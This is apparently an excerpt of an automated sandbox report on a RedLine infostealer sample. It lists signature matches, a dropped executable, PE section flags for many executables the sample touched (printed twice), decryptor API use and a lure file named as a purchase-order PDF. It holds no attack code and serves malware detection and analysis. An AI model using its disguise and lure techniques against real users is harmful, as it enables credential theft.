                            Source: 4.2.svchost.exe.5600000.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                            Source: 00000004.00000002.2126128048.0000000005600000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                            Source: C:\Users\user\AppData\Local\Temp\microsofts.exe, type: DROPPEDMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                            Source: armsvc.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: ShowAppPickerForPDF.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: Acrobat.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: private_browsing.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: updater.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: Au3Info.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: Au3Info_x64.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: AutoIt3Help.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: AutoIt3_x64.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: appvcleaner.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: SciTE.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: AppVShNotify.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: IntegratedOffice.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: MavInject32.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: OfficeC2RClient.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: officesvcmgr.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: alg.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: chrome_pwa_launcher.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: chrmstp.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: AdobeARMHelper.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: jaureg.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: jucheck.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: jusched.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: java.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: javaw.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: javaws.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: GoogleCrashHandler.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: GoogleCrashHandler64.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: GoogleUpdate.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: AppVClient.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: DiagnosticsHub.StandardCollector.Service.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: FXSSVC.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: GoogleUpdateBroker.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: GoogleUpdateComRegisterShell64.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: GoogleUpdateCore.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: GoogleUpdateOnDemand.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: 117.0.5938.132_chrome_installer.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: jabswitch.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: java-rmi.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: java.exe0.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: javacpl.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: javaw.exe0.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: elevation_service.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: elevation_service.exe0.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: maintenanceservice.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: msdtc.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: msiexec.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: javaws.exe0.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: jjs.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: jp2launcher.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: armsvc.exe.4.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: ShowAppPickerForPDF.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: Acrobat.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: private_browsing.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: updater.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: Au3Info.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: Au3Info_x64.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: AutoIt3Help.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: AutoIt3_x64.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: appvcleaner.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: SciTE.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: AppVShNotify.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: IntegratedOffice.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: MavInject32.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: OfficeC2RClient.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: officesvcmgr.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: alg.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: chrome_pwa_launcher.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: chrmstp.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: AdobeARMHelper.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: jaureg.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: jucheck.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: jusched.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: java.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: javaw.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: javaws.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: GoogleCrashHandler.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: GoogleCrashHandler64.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: GoogleUpdate.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: AppVClient.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: DiagnosticsHub.StandardCollector.Service.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: FXSSVC.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: GoogleUpdateBroker.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: GoogleUpdateComRegisterShell64.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: GoogleUpdateCore.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: GoogleUpdateOnDemand.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: 117.0.5938.132_chrome_installer.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: jabswitch.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: java-rmi.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: java.exe0.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: javacpl.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: javaw.exe0.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: elevation_service.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: elevation_service.exe0.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: maintenanceservice.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: msdtc.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: msiexec.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: javaws.exe0.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: jjs.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: jp2launcher.exe.5.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                            Source: Native_Redline_BTC.exe.4.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                            Source: Native_Redline_BTC.exe.4.dr, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                            Source: Native_Redline_BTC.exe.4.dr, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                            Source: 4.2.svchost.exe.6000000.3.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                            Source: 4.2.svchost.exe.6000000.3.raw.unpack, WP6RZJql8gZrNhVA9v.csCryptographic APIs: 'CreateDecryptor'
                            Source: classification engineClassification label: mal100.spre.troj.spyw.expl.evad.winEXE@49/171@148/22
                            Source: C:\Users\user\Desktop\PO-NBQ73652_ORDER_T637MOO746_MATERIALS_SIZES-PDF.scr.exeCode function: 0_2_0044AF5C GetLastError,FormatMessageW,0_2_0044AF5C
